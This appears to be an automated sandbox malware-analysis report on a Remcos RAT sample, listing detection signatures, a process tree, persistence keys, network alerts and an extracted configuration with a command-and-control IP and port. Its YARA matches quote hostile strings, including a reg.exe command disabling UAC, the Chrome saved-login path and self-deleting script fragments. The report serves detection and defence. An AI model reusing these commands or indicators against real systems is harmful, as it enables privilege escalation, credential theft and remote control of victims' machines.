
Windows Analysis Report
yPIOW6yoPi.exe

Overview

General Information

Sample name: yPIOW6yoPi.exe (renamed because the original name is a hash value)
Original sample name: 4d8f242a1d64b3b41748d2bd56ee6f7119434dedcdf793a83cea95fb31d13347.exe
Analysis ID: 1588844
MD5: a0acd7920f09a59331e008f8d3dc7ac1
SHA1: f6bf51b2bccc91476136e43a91b17076ed78b083
SHA256: 4d8f242a1d64b3b41748d2bd56ee6f7119434dedcdf793a83cea95fb31d13347
Tags: exe, RemcosRAT, user-adrian__luca

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • yPIOW6yoPi.exe (PID: 1612 cmdline: "C:\Users\user\Desktop\yPIOW6yoPi.exe" MD5: A0ACD7920F09A59331E008F8D3DC7AC1)
    • WerFault.exe (PID: 3352 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1000 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6248 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1008 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4072 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1112 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1120 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5800 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1116 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1120 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1044 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • yavascript.exe (PID: 1512 cmdline: "C:\Users\user\AppData\Roaming\xenor\yavascript.exe" MD5: A0ACD7920F09A59331E008F8D3DC7AC1)
      • WerFault.exe (PID: 1016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 708 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 4144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 716 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 1340 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 744 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3192 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 708 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 752 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 920 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 364 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1300 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • yavascript.exe (PID: 4196 cmdline: "C:\Users\user\AppData\Roaming\xenor\yavascript.exe" MD5: A0ACD7920F09A59331E008F8D3DC7AC1)
    • WerFault.exe (PID: 7132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 472 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • yavascript.exe (PID: 1352 cmdline: "C:\Users\user\AppData\Roaming\xenor\yavascript.exe" MD5: A0ACD7920F09A59331E008F8D3DC7AC1)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Extracted malware configuration (Remcos): {"Host:Port:Password": ["198.23.227.212:32583:1"], "Assigned name": "Yavakosa", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "yavascript.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I7G983", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "xenor", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000014.00000002.2309360524.0000000000600000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.2295191627.00000000005A4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000026.00000002.2378502507.00000000020E0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
(87 entries in total)
Source | Rule | Description | Author | Strings
17.2.yavascript.exe.750e67.1.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
17.2.yavascript.exe.750e67.1.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
17.2.yavascript.exe.750e67.1.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
17.2.yavascript.exe.750e67.1.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
17.2.yavascript.exe.750e67.1.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]
(139 entries in total)

System Summary

Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Users\user\AppData\Roaming\xenor\yavascript.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\yPIOW6yoPi.exe, ProcessId: 1612, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-I7G983

Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security; Data: Details: 1E 04 D2 DB 3F 0C FE F3 82 62 77 23 55 F6 79 B1 49 36 BC E5 8F 32 CD 27 A0 CB 6E 6A 9F 1A 20 B0 87 53 A6 49 46 14 C8 00 36 A6 D3 34 C0 ED 1C E0 39 9D 39 D1 15 0E C3 90 91 15 47 75 AC 34 37 C5 71 C4 5B 5A BB 89 3F B2 EC 68 87 0C EB 47 9D 30 F2 73 49 70 31 DF 74 DA 6A E1 4D 5F 63 46 B7 13 85 71 44 89 2D 9B 50 50 FC E0 75 12 7B 62, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, ProcessId: 1512, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-I7G983\exepath

Suricata IDS alerts (network traffic):
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T06:12:49.237371+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49753 | 198.23.227.212 | 32583 | TCP
2025-01-11T06:13:01.128869+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49828 | 178.237.33.50 | 80 | TCP


AV Detection

Source: yPIOW6yoPi.exe; Avira: detected
Source: 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["198.23.227.212:32583:1"], "Assigned name": "Yavakosa", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "yavascript.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I7G983", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "xenor", "Keylog folder": "remcos"}
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; ReversingLabs: Detection: 71%
Source: yPIOW6yoPi.exe; ReversingLabs: Detection: 71%
Source: Yara match; File source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2295191627.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.2378390823.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.2309481158.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTR
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: yPIOW6yoPi.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_0043293A
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_02122BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_02122BA1
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_0043293A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_00782BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_00782BA1
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,20_2_0043293A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_02162BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,20_2_02162BA1
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 38_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,38_2_0043293A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 38_2_021B2BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,38_2_021B2BA1
Source: yPIOW6yoPi.exe; Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match; File source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_00406764 _wcslen,CoGetObject,0_2_00406764
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_00406764 _wcslen,CoGetObject,17_2_00406764
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 20_2_00406764 _wcslen,CoGetObject,20_2_00406764
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 38_2_00406764 _wcslen,CoGetObject,38_2_00406764
Source: yPIOW6yoPi.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B335
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0041B42F
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040B53A
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_0044D5E9 FindFirstFileExA,0_2_0044D5E9
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,0_2_004089A9
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,0_2_00406AC2
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_00407A8C
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00418C69
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,0_2_00408DA7
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_020F900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_020F900E
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_0210B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0210B696
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_020FB59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_020FB59C
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_0213D850 FindFirstFileExA,0_2_0213D850
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_02108ED0 FindFirstFileW,0_2_02108ED0
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_020F7CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_020F7CF3
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe; Code function: 0_2_020F6D29 FindFirstFileW,FindNextFileW,0_2_020F6D29
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,17_2_0041B42F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040B53A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_0044D5E9 FindFirstFileExA,17_2_0044D5E9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,17_2_004089A9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_00406AC2 FindFirstFileW,FindNextFileW,17_2_00406AC2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,17_2_00407A8C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00418C69
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,17_2_00408DA7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_0075900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0075900E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe; Code function: 17_2_0075B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0075B59C
